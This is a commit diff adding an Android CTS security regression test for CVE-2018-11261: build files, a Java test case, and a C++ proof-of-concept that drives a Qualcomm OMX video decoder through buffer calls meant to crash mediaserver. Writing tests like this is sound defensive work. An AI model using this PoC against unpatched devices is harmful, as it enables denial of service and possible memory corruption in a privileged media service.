CTS test for Android Security b/113527377
Test: successful run of newly introduced CTS test case.
Bug: 113527377
Change-Id: Ic13afee0427be06475395e11f39e231661debb36
Merged-In: Ic13afee0427be06475395e11f39e231661debb36
(cherry picked from commit 334bfadcb70a953430184c02fe04c15150df33de)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 6878d30..8ca3e00 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -181,6 +181,11 @@
<option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" />
<!--__________________-->
+ <!-- Bulletin 2018-09 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2018-11261->/data/local/tmp/CVE-2018-11261" />
+
+ <!--__________________-->
<!-- Bulletin 2018-10 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2018-9490->/data/local/tmp/CVE-2018-9490" />
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/Android.mk
new file mode 100644
index 0000000..fa13952
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/Android.mk
@@ -0,0 +1,23 @@
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2018-11261
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/frameworks/av/include/media/ \
+ $(TOP)/frameworks/native/include/media/openmax \
+ $(TOP)/hardware/libhardware/modules/gralloc/ \
+ $(TOP)/frameworks/av/media/libstagefright/ \
+ $(TARGET_OUT_INTERMEDIATES)/include/mm-core/
+
+LOCAL_SHARED_LIBRARIES += libmedia libbinder libui libgui libutils
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS+= -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/poc.cpp
new file mode 100644
index 0000000..91d5b0e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/poc.cpp
@@ -0,0 +1,133 @@
+/**
+ * CVE-2018-11261
+ */
+#undef _GNU_SOURCE
+#define _GNU_SOURCE
+#include "../includes/common.h"
+#include "OMX_Component.h"
+#include <binder/IServiceManager.h>
+#include <binder/ProcessState.h>
+#include <media/IMediaPlayerService.h>
+#include <media/IOMX.h>
+#include <media/OMXBuffer.h>
+#include <media/hardware/HardwareAPI.h>
+#include <omx/OMXUtils.h>
+#include <stdlib.h>
+#include <time.h>
+
+using namespace android;
+
+struct DummyOMXObserver : public BnOMXObserver {
+public:
+ DummyOMXObserver() {}
+
+ virtual void onMessages(const std::list<omx_message> &messages __unused) {}
+
+protected:
+ virtual ~DummyOMXObserver() {}
+};
+
+struct DeathRecipient : public IBinder::DeathRecipient {
+ DeathRecipient() : mDied(false) {}
+ bool mDied;
+ virtual void binderDied(const wp<IBinder> &who __unused) { mDied = true; }
+ bool died() const { return mDied; }
+};
+
+extern bool connectOMX(sp<IOMX> &omx) {
+ sp<IBinder> binder;
+ sp<IServiceManager> sm = defaultServiceManager();
+
+ binder = sm->getService(String16("media.player"));
+ sp<IMediaPlayerService> service = interface_cast<IMediaPlayerService>(binder);
+
+ if (binder == NULL) {
+ return false;
+ }
+ omx = service->getOMX();
+ if (omx == NULL) {
+ return false;
+ }
+ return true;
+}
+
+int poc() {
+ sp<IOMX> service;
+ if (connectOMX(service) == false) {
+ return EXIT_FAILURE;
+ }
+ sp<IOMXNode> node = 0;
+ OMXBuffer omxBuf;
+ int fenceFd = -1;
+ sp<DummyOMXObserver> observer = new DummyOMXObserver();
+
+ const char *codecName = "OMX.qcom.video.decoder.avc";
+ status_t err = service->allocateNode(codecName, observer, &node);
+ if (err != OK) {
+ return EXIT_FAILURE;
+ }
+ sp<DeathRecipient> deathRecipient(new DeathRecipient());
+ IInterface::asBinder(service)->linkToDeath(deathRecipient);
+
+ err = node->sendCommand(OMX_CommandStateSet, 2);
+ // get input port parameters
+ OMX_PARAM_PORTDEFINITIONTYPE def;
+ InitOMXParams(&def);
+ def.nPortIndex = 0;
+ OMX_INDEXTYPE omx_indextype = OMX_IndexParamPortDefinition;
+ err = node->getParameter(omx_indextype, &def, sizeof(def));
+
+ int inMemSize = def.nBufferCountActual * def.nBufferSize;
+ int inBufferCnt = def.nBufferCountActual;
+ int inBufferSize = inMemSize / inBufferCnt;
+ sp<MemoryDealer> dealerIn = new MemoryDealer(inMemSize);
+ IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCnt];
+
+ // get output port parameters
+ InitOMXParams(&def);
+ def.nPortIndex = 1;
+ err = node->getParameter(omx_indextype, &def, sizeof(def));
+
+ // prepare output port buffers
+ int outMemSize = def.nBufferCountActual * def.nBufferSize;
+ int outBufferCnt = def.nBufferCountActual;
+ int outBufferSize = outMemSize / outBufferCnt;
+ sp<MemoryDealer> dealerOut = new MemoryDealer(outMemSize);
+
+ for (int i = 0; i < inBufferCnt; i++) {
+ sp<IMemory> memory = dealerIn->allocate(inBufferSize);
+ memset(memory->pointer(), 0xcd, inBufferSize);
+ OMXBuffer omxBuf(memory);
+ err = node->useBuffer(0, omxBuf, &inBufferId[i]);
+ }
+
+ for (int i = 0; i < outBufferCnt; i++) {
+ sp<IMemory> memory = dealerOut->allocate(outBufferSize);
+ memset(memory->pointer(), 0x9a, outBufferSize);
+ }
+
+ // change state from idle to executing
+ err = node->sendCommand(OMX_CommandStateSet, 3);
+
+ for (int i = 0; i < inBufferCnt; i++) {
+ err = node->emptyBuffer(inBufferId[i], omxBuf, 0, 0, fenceFd);
+ node->freeBuffer(1, inBufferId[i]);
+ }
+ sleep(1);
+ node->freeNode();
+ if (deathRecipient->died()) {
+ exit(0); //binder died
+ }
+ return 0;
+}
+
+int main() {
+ sp<ProcessState> proc(ProcessState::self());
+ ProcessState::self()->startThreadPool();
+ time_t test_started = start_timer();
+ while (timer_active(test_started)) {
+ poc();
+ sleep(1);
+ }
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_09.java
new file mode 100644
index 0000000..25bc89e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_09.java
@@ -0,0 +1,15 @@
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc18_09 extends SecurityTestCase {
+
+ /**
+ * CVE-2018-11261
+ */
+ @SecurityTest(minPatchLevel = "2018-09")
+ public void testPocCVE_2018_11261() throws Exception {
+ AdbUtils.runPocAssertNoCrashes("CVE-2018-11261", getDevice(), "mediaserver");
+ }
+}
